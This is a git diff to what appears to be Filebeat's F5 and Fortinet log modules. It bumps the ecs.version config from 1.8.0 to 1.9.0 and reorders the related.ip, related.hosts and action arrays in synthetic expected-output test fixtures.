@@ -2994,10 +2994,10 @@ "rmagnido5483.local" ], "related.ip": [ - "10.67.221.220", + "10.67.173.228", "10.180.62.222", - "10.2.189.20", - "10.67.173.228" + "10.67.221.220", + "10.2.189.20" ], "related.user": [ "uptasnul" @@ -3062,10 +3062,10 @@ "uian521.www.example" ], "related.ip": [ + "10.56.134.118", "10.147.127.181", - "10.196.176.243", "10.209.52.47", - "10.56.134.118" + "10.196.176.243" ], "related.user": [ "tasu" @@ -3129,10 +3129,10 @@ "taliq5213.api.corp" ], "related.ip": [ - "10.231.18.90", "10.226.24.84", + "10.248.140.59", "10.85.13.237", - "10.248.140.59" + "10.231.18.90" ], "related.user": [ "Nem" @@ -3197,9 +3197,9 @@ "ntsunt4894.mail.domain" ], "related.ip": [ + "10.59.215.207", "10.207.183.204", "10.8.224.72", - "10.59.215.207", "10.203.46.215" ], "related.user": [ @@ -3267,8 +3267,8 @@ "related.ip": [ "10.98.154.146", "10.73.84.95", - "10.230.38.148", - "10.255.145.22" + "10.255.145.22", + "10.230.38.148" ], "related.user": [ "sitam" @@ -3332,10 +3332,10 @@ "oluptat6960.www5.test" ], "related.ip": [ - "10.211.29.187", - "10.105.120.162", "10.166.142.198", - "10.175.181.138" + "10.175.181.138", + "10.105.120.162", + "10.211.29.187" ], "related.user": [ "tium" @@ -3401,9 +3401,9 @@ ], "related.ip": [ "10.195.139.25", - "10.122.133.162", + "10.220.202.102", "10.182.213.195", - "10.220.202.102" + "10.122.133.162" ], "related.user": [ "aquae" @@ -3469,9 +3469,9 @@ ], "related.ip": [ "10.156.208.5", + "10.33.143.163", "10.53.72.161", - "10.247.144.9", - "10.33.143.163" + "10.247.144.9" ], "related.user": [ "scip" @@ -3535,9 +3535,9 @@ "exer447.internal.localhost" ], "related.ip": [ - "10.21.58.162", "10.113.65.192", "10.241.143.145", + "10.21.58.162", "10.35.190.164" ], "related.user": [ @@ -3603,10 +3603,10 @@ "itanimi1934.home" ], "related.ip": [ + "10.75.113.240", "10.53.27.253", - "10.129.16.166", "10.19.154.103", - "10.75.113.240" + "10.129.16.166" ], "related.user": [ "luptat" 
@@ -3671,10 +3671,10 @@ "pteurs1031.mail.corp" ], "related.ip": [ + "10.22.213.196", "10.120.50.13", - "10.150.153.61", "10.125.150.220", - "10.22.213.196" + "10.150.153.61" ], "related.user": [ "inculpa" @@ -3739,10 +3739,10 @@ "edquiaco6562.api.lan" ], "related.ip": [ + "10.229.155.171", "10.113.2.13", - "10.238.171.184", "10.85.52.249", - "10.229.155.171" + "10.238.171.184" ], "related.user": [ "tatiset" @@ -3807,9 +3807,9 @@ "tatis7315.mail.home" ], "related.ip": [ + "10.249.174.35", "10.198.150.185", "10.220.1.249", - "10.249.174.35", "10.51.245.225" ], "related.user": [ @@ -3875,10 +3875,10 @@ "eosqui3723.api.localdomain" ], "related.ip": [ - "10.38.185.31", - "10.152.157.32", "10.251.82.195", - "10.190.96.181" + "10.190.96.181", + "10.38.185.31", + "10.152.157.32" ], "related.user": [ "olorese" @@ -3942,10 +3942,10 @@ "itaedict199.mail.corp" ], "related.ip": [ - "10.103.102.242", - "10.211.198.50", "10.190.247.194", - "10.230.112.179" + "10.230.112.179", + "10.211.198.50", + "10.103.102.242" ], "related.user": [ "tDuisaut" @@ -4009,10 +4009,10 @@ "xeaco7887.www.localdomain" ], "related.ip": [ - "10.219.83.199", - "10.101.13.122", "10.47.223.155", - "10.251.101.61" + "10.101.13.122", + "10.251.101.61", + "10.219.83.199" ], "related.user": [ "ectetur" @@ -4077,8 +4077,8 @@ "saute7421.www.invalid" ], "related.ip": [ - "10.21.80.157", "10.83.136.233", + "10.21.80.157", "10.31.86.83", "10.21.30.43" ], @@ -4147,8 +4147,8 @@ "related.ip": [ "10.27.181.27", "10.194.197.107", - "10.45.152.205", - "10.195.90.73" + "10.195.90.73", + "10.45.152.205" ], "related.user": [ "datatn" @@ -4213,10 +4213,10 @@ "ididu5505.api.localdomain" ], "related.ip": [ - "10.183.90.25", - "10.129.161.18", "10.43.239.97", - "10.222.2.132" + "10.129.161.18", + "10.222.2.132", + "10.183.90.25" ], "related.user": [ "aedicta" @@ -4281,8 +4281,8 @@ ], "related.ip": [ "10.67.129.100", - "10.189.162.131", "10.231.167.171", + "10.189.162.131", "10.248.156.138" ], "related.user": [ 
@@ -4348,8 +4348,8 @@ "siuta2155.lan" ], "related.ip": [ - "10.185.107.27", "10.6.146.184", + "10.185.107.27", "10.142.106.66", "10.63.103.30" ], @@ -4415,10 +4415,10 @@ "tatiset4191.localdomain" ], "related.ip": [ - "10.119.179.182", + "10.0.202.9", "10.93.39.237", - "10.214.93.200", - "10.0.202.9" + "10.119.179.182", + "10.214.93.200" ], "related.user": [ "tionofd" @@ -4483,10 +4483,10 @@ "aute2433.mail.lan" ], "related.ip": [ - "10.123.154.140", "10.252.204.162", - "10.30.189.166", - "10.28.145.163" + "10.28.145.163", + "10.123.154.140", + "10.30.189.166" ], "related.user": [ "imadmin" @@ -4550,9 +4550,9 @@ "idolo6535.internal.example" ], "related.ip": [ - "10.79.49.3", "10.145.128.250", "10.29.122.183", + "10.79.49.3", "10.46.162.198" ], "related.user": [ @@ -4686,10 +4686,10 @@ "uptatem4446.internal.localhost" ], "related.ip": [ - "10.191.78.86", - "10.215.184.154", "10.29.217.44", - "10.53.188.140" + "10.191.78.86", + "10.53.188.140", + "10.215.184.154" ], "related.user": [ "iarc" @@ -4754,9 +4754,9 @@ "emq2514.api.localhost" ], "related.ip": [ - "10.135.77.156", "10.76.148.147", "10.46.222.149", + "10.135.77.156", "10.74.74.129" ], "related.user": [ @@ -4822,8 +4822,8 @@ ], "related.ip": [ "10.11.146.253", - "10.130.203.37", "10.145.49.29", + "10.130.203.37", "10.96.200.223" ], "related.user": [ @@ -4888,9 +4888,9 @@ "ipi4827.mail.lan" ], "related.ip": [ - "10.162.78.48", - "10.24.23.209", "10.48.75.140", + "10.24.23.209", + "10.162.78.48", "10.162.2.180" ], "related.user": [ @@ -4955,10 +4955,10 @@ "sequatD163.internal.example" ], "related.ip": [ - "10.119.12.186", - "10.97.105.115", + "10.66.92.83", "10.151.206.38", - "10.66.92.83" + "10.119.12.186", + "10.97.105.115" ], "related.user": [ "nproide" @@ -5022,10 +5022,10 @@ "itamet1303.invalid" ], "related.ip": [ - "10.201.132.114", - "10.64.76.142", "10.169.139.250", - "10.12.148.73" + "10.64.76.142", + "10.12.148.73", + "10.201.132.114" ], "related.user": [ "borisnis" 
@@ -5090,10 +5090,10 @@ "epr3512.internal.domain" ], "related.ip": [ - "10.200.116.191", "10.9.236.18", - "10.111.128.11", - "10.35.38.185" + "10.35.38.185", + "10.200.116.191", + "10.111.128.11" ], "related.user": [ "umfug" @@ -5157,10 +5157,10 @@ "uredol2174.home" ], "related.ip": [ - "10.191.27.182", - "10.134.238.8", "10.236.67.227", - "10.240.62.238" + "10.134.238.8", + "10.240.62.238", + "10.191.27.182" ], "related.user": [ "tlabo" @@ -5224,10 +5224,10 @@ "ididunt7607.mail.localhost" ], "related.ip": [ - "10.22.231.91", - "10.109.14.142", "10.65.35.64", - "10.165.66.92" + "10.165.66.92", + "10.109.14.142", + "10.22.231.91" ], "related.user": [ "perna" @@ -5292,9 +5292,9 @@ ], "related.ip": [ "10.64.161.215", - "10.89.221.90", + "10.71.112.86", "10.29.230.203", - "10.71.112.86" + "10.89.221.90" ], "related.user": [ "rnatur" @@ -5358,10 +5358,10 @@ "nonn1650.www.test" ], "related.ip": [ - "10.221.199.137", - "10.79.208.135", + "10.88.226.76", "10.140.118.182", - "10.88.226.76" + "10.79.208.135", + "10.221.199.137" ], "related.user": [ "erspic" @@ -5426,10 +5426,10 @@ "acons3940.api.lan" ], "related.ip": [ - "10.126.61.230", - "10.133.48.55", + "10.189.244.22", "10.35.73.208", - "10.189.244.22" + "10.126.61.230", + "10.133.48.55" ], "related.user": [ "tia" @@ -5493,10 +5493,10 @@ "suscipit587.www.localhost" ], "related.ip": [ - "10.81.154.115", - "10.239.194.105", + "10.240.94.109", "10.35.65.72", - "10.240.94.109" + "10.81.154.115", + "10.239.194.105" ], "related.user": [ "reseo" @@ -5561,10 +5561,10 @@ "mnisiut6146.internal.local" ], "related.ip": [ - "10.38.253.213", - "10.150.56.227", "10.52.70.192", - "10.248.72.104" + "10.38.253.213", + "10.248.72.104", + "10.150.56.227" ], "related.user": [ "ionem" @@ -5630,9 +5630,9 @@ ], "related.ip": [ "10.203.193.134", - "10.73.172.186", + "10.62.218.239", "10.218.15.164", - "10.62.218.239" + "10.73.172.186" ], "related.user": [ "reh" 
@@ -5696,10 +5696,10 @@ "msequ323.www.example" ], "related.ip": [ - "10.131.127.113", - "10.10.46.43", + "10.136.211.234", "10.60.20.76", - "10.136.211.234" + "10.10.46.43", + "10.131.127.113" ], "related.user": [ "nev" @@ -5764,10 +5764,10 @@ "tdolorem813.internal.host" ], "related.ip": [ - "10.50.177.151", - "10.233.181.250", "10.248.0.74", - "10.187.237.220" + "10.187.237.220", + "10.50.177.151", + "10.233.181.250" ], "related.user": [ "ugiatq" @@ -5832,10 +5832,10 @@ "volupt4626.internal.test" ], "related.ip": [ - "10.80.129.81", + "10.96.223.46", "10.248.248.120", "10.189.43.11", - "10.96.223.46" + "10.80.129.81" ], "related.user": [ "iatn" @@ -5900,10 +5900,10 @@ "ntium5103.www5.localhost" ], "related.ip": [ - "10.173.114.63", - "10.66.106.186", + "10.91.115.139", "10.102.109.199", - "10.91.115.139" + "10.66.106.186", + "10.173.114.63" ], "related.user": [ "tNequ" @@ -5970,8 +5970,8 @@ "related.ip": [ "10.0.175.17", "10.198.157.122", - "10.159.155.88", - "10.221.223.127" + "10.221.223.127", + "10.159.155.88" ], "related.user": [ "iquipex" @@ -6035,9 +6035,9 @@ "equu7361.www5.localdomain" ], "related.ip": [ + "10.252.136.130", "10.189.70.237", "10.7.212.201", - "10.252.136.130", "10.30.20.187" ], "related.user": [ @@ -6172,8 +6172,8 @@ ], "related.ip": [ "10.219.174.45", - "10.251.167.219", "10.181.134.69", + "10.251.167.219", "10.17.20.93" ], "related.user": [ @@ -6240,9 +6240,9 @@ ], "related.ip": [ "10.28.233.253", + "10.30.117.82", "10.223.99.90", - "10.37.14.20", - "10.30.117.82" + "10.37.14.20" ], "related.user": [ "numqua" @@ -6307,9 +6307,9 @@ "lites1614.www.corp" ], "related.ip": [ - "10.50.61.114", "10.8.32.17", "10.125.20.22", + "10.50.61.114", "10.57.85.113" ], "related.user": [ @@ -6375,9 +6375,9 @@ "lorinrep7686.mail.corp" ], "related.ip": [ - "10.200.28.55", "10.215.224.27", "10.181.63.82", + "10.200.28.55", "10.113.78.101" ], "related.user": [ 
@@ -6443,9 +6443,9 @@ "nderit6272.mail.example" ], "related.ip": [ - "10.169.95.128", "10.177.14.106", "10.139.20.223", + "10.169.95.128", "10.243.43.168" ], "related.user": [ @@ -6511,10 +6511,10 @@ "ntu1279.mail.lan" ], "related.ip": [ - "10.90.93.4", - "10.18.176.44", "10.39.100.88", - "10.92.168.198" + "10.92.168.198", + "10.90.93.4", + "10.18.176.44" ], "related.user": [ "adminima" @@ -6579,9 +6579,9 @@ "essequam1161.domain" ], "related.ip": [ - "10.49.68.8", - "10.173.13.179", "10.193.43.135", + "10.173.13.179", + "10.49.68.8", "10.163.203.191" ], "related.user": [ @@ -6714,9 +6714,9 @@ "item3647.home" ], "related.ip": [ + "10.52.13.192", "10.32.20.4", "10.225.189.229", - "10.52.13.192", "10.86.1.244" ], "related.user": [ diff --git a/x-pack/filebeat/module/f5/bigipapm/config/input.yml b/x-pack/filebeat/module/f5/bigipapm/config/input.yml index 9ca73218246..48b34268329 100644 --- a/x-pack/filebeat/module/f5/bigipapm/config/input.yml +++ b/x-pack/filebeat/module/f5/bigipapm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/f5/bigipapm/test/generated.log-expected.json b/x-pack/filebeat/module/f5/bigipapm/test/generated.log-expected.json index a67fff38ed2..e2f8690f92c 100644 --- a/x-pack/filebeat/module/f5/bigipapm/test/generated.log-expected.json +++ b/x-pack/filebeat/module/f5/bigipapm/test/generated.log-expected.json @@ -1287,6 +1287,7 @@ "forwarded" ], "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -1567,8 +1568,8 @@ "observer.vendor": "F5", "process.pid": 1973, "related.ip": [ - "10.187.64.126", - "10.47.99.72" + "10.47.99.72", + "10.187.64.126" ], "rsa.internal.messageid": "01490500", "rsa.misc.category": "oremipsu", 
diff --git a/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml b/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml index 833d5dae4a4..4c0b48fae8e 100644 --- a/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml +++ b/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml @@ -90,4 +90,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/fortinet/clientendpoint/test/generated.log-expected.json b/x-pack/filebeat/module/fortinet/clientendpoint/test/generated.log-expected.json index 5af98df5cc9..06f7ab9a1d1 100644 --- a/x-pack/filebeat/module/fortinet/clientendpoint/test/generated.log-expected.json +++ b/x-pack/filebeat/module/fortinet/clientendpoint/test/generated.log-expected.json @@ -87,8 +87,8 @@ "olupt4880.api.home" ], "related.ip": [ - "10.149.203.46", - "10.33.212.159" + "10.33.212.159", + "10.149.203.46" ], "related.user": [ "mipsumq" @@ -149,8 +149,8 @@ "aqu1628.internal.domain" ], "related.ip": [ - "10.173.116.41", - "10.118.175.9" + "10.118.175.9", + "10.173.116.41" ], "related.user": [ "uame" @@ -459,8 +459,8 @@ "isiu1114.internal.corp" ], "related.ip": [ - "10.66.108.11", - "10.198.136.50" + "10.198.136.50", + "10.66.108.11" ], "related.user": [ "uptatev" @@ -644,8 +644,8 @@ "tatno6787.internal.localhost" ], "related.ip": [ - "10.136.252.240", - "10.65.83.160" + "10.65.83.160", + "10.136.252.240" ], "related.user": [ "ender" @@ -767,8 +767,8 @@ "ali6446.localhost" ], "related.ip": [ - "10.144.82.69", - "10.200.156.102" + "10.200.156.102", + "10.144.82.69" ], "related.user": [ "rveli" @@ -828,8 +828,8 @@ "torev7118.internal.domain" ], "related.ip": [ - "10.72.58.135", - "10.109.232.112" + "10.109.232.112", + "10.72.58.135" ], "related.user": [ "xea" @@ -890,8 +890,8 @@ "dolore6103.www5.example" ], "related.ip": [ - "10.72.29.73", - "10.38.22.45" + "10.38.22.45", + "10.72.29.73" ], "related.user": [ "onproide" 
@@ -952,8 +952,8 @@ "errorsi6996.www.domain" ], "related.ip": [ - "10.76.72.111", - "10.70.95.74" + "10.70.95.74", + "10.76.72.111" ], "related.user": [ "ivelits" @@ -1014,8 +1014,8 @@ "lumquido5839.api.corp" ], "related.ip": [ - "10.73.69.75", - "10.19.201.13" + "10.19.201.13", + "10.73.69.75" ], "related.user": [ "tat" @@ -1075,8 +1075,8 @@ "aperia4409.www5.invalid" ], "related.ip": [ - "10.78.151.178", - "10.84.105.75" + "10.84.105.75", + "10.78.151.178" ], "related.user": [ "iquaUten" @@ -1199,8 +1199,8 @@ "eme6710.mail.invalid" ], "related.ip": [ - "10.104.134.200", - "10.121.219.204" + "10.121.219.204", + "10.104.134.200" ], "related.user": [ "uptat" @@ -1261,8 +1261,8 @@ "ihilm1669.mail.invalid" ], "related.ip": [ - "10.191.105.82", - "10.225.160.182" + "10.225.160.182", + "10.191.105.82" ], "related.user": [ "eirure" @@ -1323,8 +1323,8 @@ "umexerci1284.internal.localdomain" ], "related.ip": [ - "10.141.44.153", - "10.161.57.8" + "10.161.57.8", + "10.141.44.153" ], "related.user": [ "quisnos" @@ -1568,8 +1568,8 @@ "ris3314.mail.invalid" ], "related.ip": [ - "10.221.89.228", - "10.177.194.18" + "10.177.194.18", + "10.221.89.228" ], "related.user": [ "aliquam" @@ -1630,8 +1630,8 @@ "reme622.mail.example" ], "related.ip": [ - "10.241.65.49", - "10.32.239.1" + "10.32.239.1", + "10.241.65.49" ], "related.user": [ "idata" @@ -1877,8 +1877,8 @@ "etcons7378.api.lan" ], "related.ip": [ - "10.111.187.12", - "10.72.93.28" + "10.72.93.28", + "10.111.187.12" ], "related.user": [ "niamqui" @@ -2000,8 +2000,8 @@ "tnulapa7592.www.local" ], "related.ip": [ - "10.195.2.130", - "10.75.99.127" + "10.75.99.127", + "10.195.2.130" ], "related.user": [ "inibusB" @@ -2062,8 +2062,8 @@ "lup2134.www.localhost" ], "related.ip": [ - "10.201.238.90", - "10.245.104.182" + "10.245.104.182", + "10.201.238.90" ], "related.user": [ "ovol" 
@@ -2124,8 +2124,8 @@ "tanimid3337.mail.corp" ], "related.ip": [ - "10.105.91.31", - "10.217.150.196" + "10.217.150.196", + "10.105.91.31" ], "related.user": [ "con" @@ -2371,8 +2371,8 @@ "inesci6789.test" ], "related.ip": [ - "10.38.54.72", - "10.167.227.44" + "10.167.227.44", + "10.38.54.72" ], "related.user": [ "riamea" @@ -2556,8 +2556,8 @@ "ian867.internal.corp" ], "related.ip": [ - "10.83.130.226", - "10.41.123.102" + "10.41.123.102", + "10.83.130.226" ], "related.user": [ "tenim" @@ -2618,8 +2618,8 @@ "lorin4249.corp" ], "related.ip": [ - "10.175.112.197", - "10.80.152.108" + "10.80.152.108", + "10.175.112.197" ], "related.user": [ "tametcon" @@ -2742,8 +2742,8 @@ "nsequat1859.internal.localhost" ], "related.ip": [ - "10.28.118.160", - "10.223.119.218" + "10.223.119.218", + "10.28.118.160" ], "related.user": [ "ntsunt" @@ -2803,8 +2803,8 @@ "ritin2495.api.corp" ], "related.ip": [ - "10.110.114.175", - "10.47.28.48" + "10.47.28.48", + "10.110.114.175" ], "related.user": [ "plicab" @@ -2865,8 +2865,8 @@ "tetur2694.mail.local" ], "related.ip": [ - "10.90.33.138", - "10.40.251.202" + "10.40.251.202", + "10.90.33.138" ], "related.user": [ "nvolupt" @@ -2927,8 +2927,8 @@ "rem7043.localhost" ], "related.ip": [ - "10.227.173.252", - "10.65.2.106" + "10.65.2.106", + "10.227.173.252" ], "related.user": [ "itation" @@ -3050,8 +3050,8 @@ "dqu6144.api.localhost" ], "related.ip": [ - "10.150.245.88", - "10.210.89.183" + "10.210.89.183", + "10.150.245.88" ], "related.user": [ "sequa" @@ -3608,8 +3608,8 @@ "queips4947.mail.example" ], "related.ip": [ - "10.97.149.97", - "10.46.56.204" + "10.46.56.204", + "10.97.149.97" ], "related.user": [ "dolorsit" @@ -3856,8 +3856,8 @@ "aparia1179.www.localdomain" ], "related.ip": [ - "10.193.118.163", - "10.115.174.107" + "10.115.174.107", + "10.193.118.163" ], "related.user": [ "exeacomm" 
@@ -3918,8 +3918,8 @@ "iatqu6203.mail.corp" ], "related.ip": [ - "10.37.128.49", - "10.77.77.208" + "10.77.77.208", + "10.37.128.49" ], "related.user": [ "moles" @@ -4166,8 +4166,8 @@ "gitse2463.www5.invalid" ], "related.ip": [ - "10.72.162.6", - "10.235.116.121" + "10.235.116.121", + "10.72.162.6" ], "related.user": [ "oinv" @@ -4227,8 +4227,8 @@ "temse6953.www.example" ], "related.ip": [ - "10.28.124.236", - "10.149.193.117" + "10.149.193.117", + "10.28.124.236" ], "related.user": [ "mullam" @@ -4289,8 +4289,8 @@ "deriti6952.mail.domain" ], "related.ip": [ - "10.34.131.224", - "10.196.96.162" + "10.196.96.162", + "10.34.131.224" ], "related.user": [ "tnonproi" @@ -4351,8 +4351,8 @@ "abor1370.www.domain" ], "related.ip": [ - "10.77.78.180", - "10.97.236.123" + "10.97.236.123", + "10.77.78.180" ], "related.user": [ "nisi" @@ -4536,8 +4536,8 @@ "venia2079.mail.example" ], "related.ip": [ - "10.5.11.205", - "10.65.144.51" + "10.65.144.51", + "10.5.11.205" ], "related.user": [ "uptat" @@ -4660,8 +4660,8 @@ "gelitsed3249.corp" ], "related.ip": [ - "10.138.210.116", - "10.225.255.211" + "10.225.255.211", + "10.138.210.116" ], "related.user": [ "fugiatn" @@ -4722,8 +4722,8 @@ "dolor7082.internal.localhost" ], "related.ip": [ - "10.219.1.151", - "10.250.81.189" + "10.250.81.189", + "10.219.1.151" ], "related.user": [ "ori" @@ -4783,8 +4783,8 @@ "totam6886.api.localhost" ], "related.ip": [ - "10.54.23.133", - "10.76.125.70" + "10.76.125.70", + "10.54.23.133" ], "related.user": [ "oloreeu" @@ -4968,8 +4968,8 @@ "edq5397.www.test" ], "related.ip": [ - "10.221.206.74", - "10.73.28.165" + "10.73.28.165", + "10.221.206.74" ], "related.user": [ "quas" @@ -5278,8 +5278,8 @@ "enbyCi3813.api.domain" ], "related.ip": [ - "10.164.120.197", - "10.164.207.42" + "10.164.207.42", + "10.164.120.197" ], "related.user": [ "pta" @@ -5401,8 +5401,8 @@ "isn3991.local" ], "related.ip": [ - "10.103.189.199", - "10.29.120.226" + "10.29.120.226", + "10.103.189.199" ], "related.user": [ "emu" 
@@ -5462,8 +5462,8 @@ "iumtotam1010.www5.corp" ], "related.ip": [ - "10.210.153.7", - "10.133.254.23" + "10.133.254.23", + "10.210.153.7" ], "related.user": [ "voluptas" @@ -5524,8 +5524,8 @@ "onsecte91.www5.localdomain" ], "related.ip": [ - "10.91.2.135", - "10.126.245.73" + "10.126.245.73", + "10.91.2.135" ], "related.user": [ "olore" @@ -5586,8 +5586,8 @@ "abori7686.internal.host" ], "related.ip": [ - "10.183.243.246", - "10.137.85.123" + "10.137.85.123", + "10.183.243.246" ], "related.user": [ "cid" @@ -5648,8 +5648,8 @@ "reprehen3513.test" ], "related.ip": [ - "10.61.225.196", - "10.10.86.55" + "10.10.86.55", + "10.61.225.196" ], "related.user": [ "eniamqu" @@ -5896,8 +5896,8 @@ "olores7881.local" ], "related.ip": [ - "10.87.144.208", - "10.143.53.214" + "10.143.53.214", + "10.87.144.208" ], "related.user": [ "psumq" @@ -5958,8 +5958,8 @@ "tDuis3281.www5.localdomain" ], "related.ip": [ - "10.105.97.134", - "10.204.178.19" + "10.204.178.19", + "10.105.97.134" ], "related.user": [ "mexercit" @@ -6020,8 +6020,8 @@ "uptasnul2751.www5.corp" ], "related.ip": [ - "10.161.64.168", - "10.194.67.223" + "10.194.67.223", + "10.161.64.168" ], "related.user": [ "tion" @@ -6081,8 +6081,8 @@ "upt6017.api.localdomain" ], "related.ip": [ - "10.100.154.220", - "10.120.148.241" + "10.120.148.241", + "10.100.154.220" ], "related.user": [ "rsitam" @@ -6143,8 +6143,8 @@ "tpers2217.internal.lan" ], "related.ip": [ - "10.116.153.19", - "10.180.90.112" + "10.180.90.112", + "10.116.153.19" ], "related.user": [ "itessequ" diff --git a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml index 61f503d7f99..f83d8bfe67d 100644 --- a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_interfaces }} - add_fields: 
diff --git a/x-pack/filebeat/module/fortinet/fortimail/config/input.yml b/x-pack/filebeat/module/fortinet/fortimail/config/input.yml index b4ae86db1ff..8bbe81b5f46 100644 --- a/x-pack/filebeat/module/fortinet/fortimail/config/input.yml +++ b/x-pack/filebeat/module/fortinet/fortimail/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/fortinet/fortimail/test/generated.log-expected.json b/x-pack/filebeat/module/fortinet/fortimail/test/generated.log-expected.json index bbc0d867dd2..ebb3d607be5 100644 --- a/x-pack/filebeat/module/fortinet/fortimail/test/generated.log-expected.json +++ b/x-pack/filebeat/module/fortinet/fortimail/test/generated.log-expected.json @@ -1262,12 +1262,12 @@ "observer.type": "Firewall", "observer.vendor": "Fortinet", "related.hosts": [ - "estl5804.internal.local", - "atise3421.www5.localdomain" + "atise3421.www5.localdomain", + "estl5804.internal.local" ], "related.ip": [ - "10.179.210.218", - "10.73.207.70" + "10.73.207.70", + "10.179.210.218" ], "rsa.email.email_dst": "rumSecti", "rsa.email.email_src": "taut", @@ -2680,8 +2680,8 @@ "observer.type": "Firewall", "observer.vendor": "Fortinet", "related.hosts": [ - "mveni5084.internal.local", - "taevit4968.mail.local" + "taevit4968.mail.local", + "mveni5084.internal.local" ], "related.ip": [ "10.62.61.1", @@ -3135,8 +3135,8 @@ "modi6930.internal.test" ], "related.ip": [ - "10.60.164.100", - "10.161.1.146" + "10.161.1.146", + "10.60.164.100" ], "rsa.email.email_dst": "nproiden", "rsa.email.email_src": "etconse", @@ -3235,12 +3235,12 @@ "observer.type": "Firewall", "observer.vendor": "Fortinet", "related.hosts": [ - "uradip7802.mail.example", - "tetura7106.www5.corp" + "tetura7106.www5.corp", + "uradip7802.mail.example" ], "related.ip": [ - "10.93.239.216", - "10.44.35.57" + "10.44.35.57", + "10.93.239.216" ], "rsa.email.email_dst": "ciun", "rsa.email.email_src": "vento", 
diff --git a/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml b/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml index ff232c9266e..656a9b63cde 100644 --- a/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml +++ b/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/fortinet/fortimanager/test/generated.log-expected.json b/x-pack/filebeat/module/fortinet/fortimanager/test/generated.log-expected.json index da3536a339d..50a83d1ed28 100644 --- a/x-pack/filebeat/module/fortinet/fortimanager/test/generated.log-expected.json +++ b/x-pack/filebeat/module/fortinet/fortimanager/test/generated.log-expected.json @@ -28,9 +28,9 @@ "modtempo" ], "related.ip": [ + "10.189.58.145", "10.20.234.169", - "10.44.173.44", - "10.189.58.145" + "10.44.173.44" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -99,8 +99,8 @@ "aer445.host" ], "related.ip": [ - "10.171.204.166", - "10.62.4.246" + "10.62.4.246", + "10.171.204.166" ], "related.user": [ "oluptas" @@ -110,8 +110,8 @@ "rsa.investigations.event_vcat": "eius", "rsa.misc.OS": "anonnu", "rsa.misc.action": [ - "mol", - "accept" + "accept", + "mol" ], "rsa.misc.category": "exe", "rsa.misc.client": "radip", @@ -188,9 +188,9 @@ "ccaecat" ], "related.ip": [ + "10.200.188.142", "10.15.159.80", - "10.94.103.117", - "10.200.188.142" + "10.94.103.117" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -255,9 +255,9 @@ "lorem" ], "related.ip": [ + "10.27.88.95", "10.131.233.27", - "10.50.112.141", - "10.27.88.95" + "10.50.112.141" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ 
@@ -322,13 +322,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.5670", "related.hosts": [ - "ntutl", "roinBCSe", + "ntutl", "olo7148.mail.home" ], "related.ip": [ - "10.157.213.15", - "10.87.212.179" + "10.87.212.179", + "10.157.213.15" ], "related.user": [ "rveli" @@ -338,8 +338,8 @@ "rsa.investigations.event_vcat": "aveniam", "rsa.misc.OS": "oll", "rsa.misc.action": [ - "allow", - "ali" + "ali", + "allow" ], "rsa.misc.category": "emeumfug", "rsa.misc.client": "caecatc", @@ -420,8 +420,8 @@ "agna7678.internal.host" ], "related.ip": [ - "10.76.73.140", - "10.114.150.67" + "10.114.150.67", + "10.76.73.140" ], "related.user": [ "aperia" @@ -513,8 +513,8 @@ "equep5085.mail.domain" ], "related.ip": [ - "10.195.36.51", - "10.95.64.124" + "10.95.64.124", + "10.195.36.51" ], "related.user": [ "nnum" @@ -777,8 +777,8 @@ "rsa.investigations.event_vcat": "tDuisaut", "rsa.misc.OS": "Nequepor", "rsa.misc.action": [ - "sno", - "deny" + "deny", + "sno" ], "rsa.misc.category": "idolo", "rsa.misc.client": "volu", @@ -855,9 +855,9 @@ "diconseq" ], "related.ip": [ - "10.58.214.16", + "10.238.164.74", "10.106.162.153", - "10.238.164.74" + "10.58.214.16" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -923,8 +923,8 @@ ], "related.ip": [ "10.225.141.20", - "10.217.150.196", - "10.110.31.190" + "10.110.31.190", + "10.217.150.196" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -1082,8 +1082,8 @@ "onsecte" ], "related.ip": [ - "10.30.47.165", "10.25.212.118", + "10.30.47.165", "10.5.235.217" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -1148,13 +1148,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.225", "related.hosts": [ - "equaturv", "tvolu", + "equaturv", "ccaeca5504.internal.example" ], "related.ip": [ - "10.40.152.253", - "10.149.13.76" + "10.149.13.76", + "10.40.152.253" ], "related.user": [ "tetur" 
